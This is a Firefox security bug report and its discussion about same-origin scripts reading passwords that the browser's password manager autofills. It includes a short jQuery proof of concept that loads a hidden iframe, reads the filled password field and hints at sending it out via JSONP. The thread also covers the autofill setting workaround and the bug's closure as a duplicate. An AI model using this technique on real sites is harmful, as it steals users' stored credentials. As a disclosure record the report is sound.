Bug 693795 - steal the memorized password
Status: RESOLVED DUPLICATE of bug 534541
Opened 13 years ago, closed 11 years ago
Categories: Firefox :: Security, defect
People: Reporter: admin, Unassigned
Details
The vulnerability can steal the memorized password from the authorization form (the malicious code and the authorization form are on a common domain, so the same-origin policy is satisfied).
Firefox 3.6.13 .. 7.0.1, 10.0a1 nightly
Chrome 14.0.835.202 m
Operating System: Windows 7, Windows XP SP3 Pro
//Example in jQuery (requires jQuery to already be loaded on the page):
<iframe src="/admin" id="frame" style="display:none;"></iframe>
<script type="text/javascript">
$(document).ready(function(){
  // once the hidden same-origin frame has loaded, the password manager has already autofilled its form
  $('#frame').load(function(){
    var pass = $('#frame').contents().find('input[name="password"]').val();
    alert(pass); // (or send a crossdomain JSONP request)
  });
});
</script>
Comment 1•13 years ago
I don't understand what the problem is: if you have malicious code running on your site, you've already lost. Of course your site can access the password field!
Comment 2•13 years ago
Not every page has a password field, but if a malicious script creates one Firefox will helpfully fill it in for you. Without that feature attackers would have to actively phish the user into knowingly entering the password (or using something like Opera's wand), and if the user knows they're already logged in that job gets harder.
We have a bug on this somewhere. The interim solution is to set the preference signon.autofillForms to false, so users have to interact with a password field before the password manager will fill it in. At that point it can still be stolen, but that's the same as every browser in existence.
Group: core-security
Whiteboard: DUPEME
Dupe for Bug 534541?
Comment 4•11 years ago
As per comment 3.
This bug will only apply when there's an MITM going on, and that's what bug 534541 is about.
Status: UNCONFIRMED → RESOLVED
Closed: 11 years ago
Resolution: --- → DUPLICATE